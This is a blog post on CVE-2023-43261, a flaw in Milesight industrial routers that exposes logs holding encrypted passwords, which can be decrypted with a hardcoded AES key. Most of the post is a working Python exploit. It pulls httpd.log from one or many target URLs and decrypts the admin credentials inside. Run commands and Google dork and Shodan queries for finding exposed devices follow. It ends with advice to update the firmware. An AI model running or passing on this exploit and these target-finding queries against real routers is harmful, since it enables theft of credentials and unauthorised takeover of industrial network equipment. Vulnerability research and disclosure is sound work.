CVE-2023-43261: A Critical Milesight Router Vulnerability (PoC)

In today’s rapidly evolving digital landscape, network security is no longer a luxury but a necessity.

As our reliance on technology increases, so does the sophistication of cyber threats.

One such threat comes in the form of vulnerabilities in network devices, which can expose sensitive data and provide unauthorized access to malicious actors.

In this blog post, we will delve into a critical vulnerability identified as CVE-2023-43261, found in specific models of Milesight Industrial Cellular Routers.

We’ll explore its origins, implications, and how to mitigate its impact.

Overview

A critical security vulnerability, identified as CVE-2023-43261, has been discovered in specific models of Milesight Industrial Cellular Routers.

The affected products include UR5X, UR32L, UR32, UR35, UR41, and potentially other Industrial Cellular Routers.

This vulnerability, which was identified on October 1, 2023, poses a significant threat to the security of sensitive credentials and can enable unauthorized access.

Understanding the Vulnerability

The CVE-2023-43261 vulnerability is primarily due to a misconfiguration that allows directory listing on the router systems, making log files publicly accessible.

These log files contain sensitive information such as admin and other user passwords.

Although these passwords are encrypted for security reasons, the presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code enables potential decryption of these passwords.

In essence, this vulnerability can be exploited by attackers via the router’s web interface, allowing them to gain unauthorized access to the router.

How to Utilize the CVE-2023-43261 PoC Script

To exploit this vulnerability for ethical hacking or penetration testing, you can use the provided Python script:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""
Title: Credential Leakage Through Unprotected System Logs and Weak Password Encryption
CVE: CVE-2023-43261
Script Author: Bipin Jitiya (@win3zz)
Vendor: Milesight IoT - https://www.milesight-iot.com/ (Formerly Xiamen Ursalink Technology Co., Ltd.)
Software/Hardware: UR5X, UR32L, UR32, UR35, UR41 and there might be other Industrial Cellular Router could also be vulnerable.
Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10
Writeup: https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf
"""

import sys
import requests
import re
import warnings
from Crypto.Cipher import AES # pip install pycryptodome
from Crypto.Util.Padding import unpad
import base64
import time

warnings.filterwarnings("ignore")

KEY = b'1111111111111111'
IV = b'2222222222222222'

def decrypt_password(password):
    try:
        return unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(password)), AES.block_size).decode('utf-8')
    except ValueError as e:
        display_output('      [-] Error occurred during password decryption: ' + str(e), 'red')

def display_output(message, color):
    colors = {'red': '\033[91m', 'green': '\033[92m', 'blue': '\033[94m', 'yellow': '\033[93m', 'cyan': '\033[96m', 'end': '\033[0m'}
    print(f"{colors[color]}{message}{colors['end']}")
    time.sleep(0.5)

urls = []

if len(sys.argv) == 2:
    urls.append(sys.argv[1])

if len(sys.argv) == 3 and sys.argv[1] == '-f':
    with open(sys.argv[2], 'r') as file:
        urls.extend(file.read().splitlines())

if len(urls) == 0:
    display_output('Please provide a URL or a file with a list of URLs.', 'red')
    display_output('Example: python3 ' + sys.argv[0] + ' https://example.com', 'blue')
    display_output('Example: python3 ' + sys.argv[0] + ' -f urls.txt', 'blue')
    sys.exit()

use_proxy = False
proxies = {'http': 'http://127.0.0.1:8080/'} if use_proxy else None

for url in urls:
    display_output('[*] Initiating data retrieval for: ' + url + '/lang/log/httpd.log', 'blue')
    response = requests.get(url + '/lang/log/httpd.log', proxies=proxies, verify=False)

    if response.status_code == 200:
        display_output('[+] Data retrieval successful for: ' + url + '/lang/log/httpd.log', 'green')
        data = response.text
        credentials = set(re.findall(r'"username":"(.*?)","password":"(.*?)"', data))

        num_credentials = len(credentials)
        display_output(f'[+] Found {num_credentials} unique credentials for: ' + url, 'green')

        if num_credentials > 0:
            display_output('[+] Login page: ' + url + '/login.html', 'green')
            display_output('[*] Extracting and decrypting credentials for: ' + url, 'blue')
            display_output('[+] Unique Credentials:', 'yellow')
            for i, (username, password) in enumerate(credentials, start=1):
                display_output(f'    Credential {i}:', 'cyan')
                decrypted_password = decrypt_password(password.encode('utf-8'))
                display_output(f'      - Username: {username}', 'green')
                display_output(f'      - Password: {decrypted_password}', 'green')
        else:
            display_output('[-] No credentials found in the retrieved data for: ' + url, 'red')
    else:
        display_output('[-] Data retrieval failed. Please check the URL: ' + url, 'red')

Here’s how to run it:

Replace “ with your target URL and run the following command:

root@kali:~$ python3 CVE-2023-43261.py

If you need to process a list of URLs from a file, use the following command:

root@kali:~$ python3 CVE-2023-43261.py -f list_urls.txt

Google Dorks and Shodan Search Query

Google Dorks and Shodan search queries can also be used to find potential targets.

Here are some search strings that can be used:

For Google Dorks:

"/lang/log/system" ext:log

"URSALINK" "English" "Login"

For Shodan Search Query:

http.html:rt_title

Conclusion

The CVE-2023-43261 vulnerability in Milesight routers underscores the importance of staying vigilant and informed about potential security threats in our increasingly connected world.

While this vulnerability poses a significant risk, understanding its workings and how to mitigate it can go a long way in protecting your network infrastructure.

It’s essential to stay informed about such vulnerabilities and take necessary measures to protect your network infrastructure.

If you’re using any of the affected Milesight routers, ensure that you’ve updated to the latest firmware (v35.3.0.7 or later) to mitigate this vulnerability.

The severity of this vulnerability is rated 7.3/10, indicating a high level of risk. Please take immediate action if you are using any of the affected products.